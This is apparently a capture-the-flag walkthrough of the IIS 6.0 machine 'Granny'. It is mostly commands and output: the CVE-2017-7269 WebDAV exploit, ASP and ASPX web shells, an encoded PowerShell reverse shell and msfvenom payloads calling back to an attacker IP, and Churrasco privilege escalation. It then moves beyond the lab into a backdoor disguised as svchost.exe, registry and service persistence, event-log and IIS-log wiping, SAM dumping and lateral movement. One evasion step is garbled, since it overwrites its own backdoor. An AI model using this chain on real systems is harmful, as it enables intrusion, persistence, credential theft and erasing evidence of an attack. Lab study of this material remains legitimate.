Machine Synopsis
Key Exploitation Techniques:
- IIS 6.0 WebDAV vulnerability exploitation (CVE-2017-7269)
- WebDAV file upload and execution bypass techniques
- Windows kernel privilege escalation (MS09-012)
- Alternative privilege escalation vectors
Reconnaissance & Enumeration
Port Discovery
1
2
3
| $ nmap -p- --min-rate 10000 10.10.10.15
PORT STATE SERVICE
80/tcp open http
|
Service Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
| $ nmap -p 80 -sC -sV 10.10.10.15
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Mon, 07 Feb 2022 13:06:12 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|
WebDAV Testing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| # Test WebDAV functionality
$ davtest -url http://10.10.10.15
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: JKlXQ8rn
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_JKlXQ8rn
********************************************************
Sending test files
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_JKlXQ8rn/davtest_JKlXQ8rn.txt
PUT aspx FAIL
PUT asp FAIL
PUT html SUCCEED: http://10.10.10.15/DavTestDir_JKlXQ8rn/davtest_JKlXQ8rn.html
|
Exploitation
Method 1: CVE-2017-7269 Buffer Overflow
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| # Using the automated Python exploit
$ git clone https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269.git
$ cd iis6-exploit-2017-CVE-2017-7269
# Setup netcat listener
$ nc -nlvp 1234
# Execute exploit
$ python iis6_reverse_shell.py 10.10.10.15 80 10.10.14.3 1234
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
If: <http://localhost/aaaaaaa潨硣睡焳椶䝲稹䭷佰畓穏䡨噣浔桅㥓偬啧杣㍤䘰硅楒吱䱘橎牺䵈䑱呩咥嗈婰愈Ǖ壔浩㴰䀂簣堀慖圧樖尮nj潙暠̳㩮蕭䱹廌涪䝰煝䵈㤘汊浚楀焳ڝ穇敌ᄮ[...]> (Not <locktoken:write1>)
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.15] 1248
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv> whoami
nt authority\network service
|
Method 2: WebDAV File Upload Bypass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| # Create ASP reverse shell
$ cat > shell.asp << 'EOF'
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c " & Request.QueryString("cmd"))
o = cmd.StdOut.Readall()
Response.write(o)
%>
EOF
# Upload as .txt file then MOVE to .asp
$ curl -X PUT "http://10.10.10.15/shell.txt" -d @shell.asp
$ curl -X MOVE "http://10.10.10.15/shell.txt" -H "Destination: http://10.10.10.15/shell.asp"
# Test command execution
$ curl "http://10.10.10.15/shell.asp?cmd=whoami"
nt authority\network service
# Setup reverse shell
$ nc -nlvp 1337
$ curl "http://10.10.10.15/shell.asp?cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.10.14.3%27%2C1337%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22"
|
Initial Access Analysis
c:\windows\system32\inetsrv> systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
System Type: X86-based PC
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
c:\windows\system32\inetsrv> cd "C:\Documents and Settings"
C:\Documents and Settings> dir
Access is denied.
Privilege Escalation
MS09-012 (Churrasco) Exploitation
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
| # Download Churrasco exploit
$ wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
# Setup SMB server for file transfer
$ impacket-smbserver kali . -smb2support
# Create writable directory and transfer exploit
c:\windows\system32\inetsrv> cd C:\
C:\> mkdir temp
C:\> cd temp
C:\temp> copy \\10.10.14.3\KALI\churrasco.exe .
1 file(s) copied.
# Test exploit functionality
C:\temp> churrasco.exe "whoami"
nt authority\system
# Create reverse shell payload
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1337 -f exe -o shell.exe
# Transfer shell payload
C:\temp> copy \\10.10.14.3\KALI\shell.exe .
1 file(s) copied.
# Setup listener and execute privilege escalation
$ nc -nlvp 1337
C:\temp> churrasco.exe "C:\temp\shell.exe"
|
SYSTEM Access
$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.15] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\TEMP> whoami
nt authority\system
C:\WINDOWS\TEMP> cd "C:\Documents and Settings\Lakis\Desktop"
C:\Documents and Settings\Lakis\Desktop> type user.txt
700c5dc163014e22b3e408f8703f67d1
C:\WINDOWS\TEMP> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
aa4beed1c0584445ab463a6747bd06e9
Post-Exploitation Techniques
Persistence Methods
Registry Persistence
1
2
3
4
5
6
7
8
9
10
11
12
13
| # Create backdoor payload
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe -o backdoor.exe
# Transfer via SMB
$ impacket-smbserver share . -smb2support
# Install backdoor
C:\WINDOWS\TEMP> copy \\10.10.14.3\share\backdoor.exe C:\WINDOWS\system32\svchost.exe
# Add registry persistence
C:\WINDOWS\TEMP> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SystemUpdate" /t REG_SZ /d "C:\WINDOWS\system32\svchost.exe"
# Verify persistence
C:\WINDOWS\TEMP> reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
|
Service Installation
# Create persistent service
C:\WINDOWS\TEMP> sc create "SystemUpdate" binpath= "C:\WINDOWS\system32\svchost.exe" start= auto
[SC] CreateService SUCCESS
C:\WINDOWS\TEMP> sc start "SystemUpdate"
[SC] StartService SUCCESS
# Setup handler for backdoor connections
$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.3
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
Web Shell Persistence
# Install persistent web shell
C:\WINDOWS\TEMP> copy \\10.10.14.3\share\shell.asp "C:\Inetpub\wwwroot\search.asp"
# Hide file
C:\WINDOWS\TEMP> attrib +h +s "C:\Inetpub\wwwroot\search.asp"
# Access via: http://10.10.10.15/search.asp?cmd=whoami
Defense Evasion
Log Cleanup
# Clear Windows Event Logs
C:\WINDOWS\TEMP> for /f "tokens=*" %1 in ('dir /b C:\WINDOWS\system32\config\*.evt') do echo. > "C:\WINDOWS\system32\config\%1"
# Clear IIS logs
C:\WINDOWS\TEMP> del "C:\WINDOWS\system32\LogFiles\W3SVC1\*.log"
# Clear application logs
C:\WINDOWS\TEMP> del "C:\WINDOWS\system32\LogFiles\HTTPERR\*.log"
File Attribute Manipulation
# Hide backdoor files
C:\WINDOWS\TEMP> attrib +h +s +r C:\WINDOWS\system32\svchost.exe
# Timestamp manipulation
C:\WINDOWS\TEMP> copy /y C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\svchost.exe
Lateral Movement Preparation
Network Discovery
# Discover network hosts
C:\WINDOWS\TEMP> for /L %i in (1,1,254) do @ping -n 1 -w 200 10.10.10.%i | findstr "Reply"
# Check for shared resources
C:\WINDOWS\TEMP> net view \\10.10.10.1
C:\WINDOWS\TEMP> net use \\10.10.10.1\c$ /user:administrator password
Credential Harvesting
# Dump SAM database
C:\WINDOWS\TEMP> reg save HKLM\SAM C:\WINDOWS\Temp\sam.hiv
C:\WINDOWS\TEMP> reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.hiv
# Search for stored passwords
C:\WINDOWS\TEMP> findstr /si password C:\*.txt C:\*.ini C:\*.cfg
C:\WINDOWS\TEMP> dir /s /b C:\ | findstr /i password
Domain Enumeration
# Check domain information
C:\WINDOWS\TEMP> echo %USERDOMAIN%
C:\WINDOWS\TEMP> net user /domain
C:\WINDOWS\TEMP> net group "Domain Admins" /domain
Alternative Exploitation Methods
WebDAV with curl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| # Manual WebDAV file upload
$ curl -X PUT "http://10.10.10.15/test.txt" -d "test content"
$ curl -X MOVE "http://10.10.10.15/test.txt" -H "Destination: http://10.10.10.15/test.asp"
# Upload ASPX shell (if .NET available)
$ cat > shell.aspx << 'EOF'
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
}
</script>
<HTML>
<body>
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
</form>
</body>
</HTML>
EOF
$ curl -X PUT "http://10.10.10.15/shell.txt" -d @shell.aspx
$ curl -X MOVE "http://10.10.10.15/shell.txt" -H "Destination: http://10.10.10.15/shell.aspx"
|
Alternative Privilege Escalation
Token Kidnapping (Churrasco Alternative)
# If Churrasco fails, try alternative token kidnapping
C:\temp> copy \\10.10.14.3\share\ppr_flatten_rec.exe .
C:\temp> ppr_flatten_rec.exe
# MS14-058 if available
C:\temp> copy \\10.10.14.3\share\ms14-058.exe .
C:\temp> ms14-058.exe "C:\temp\shell.exe"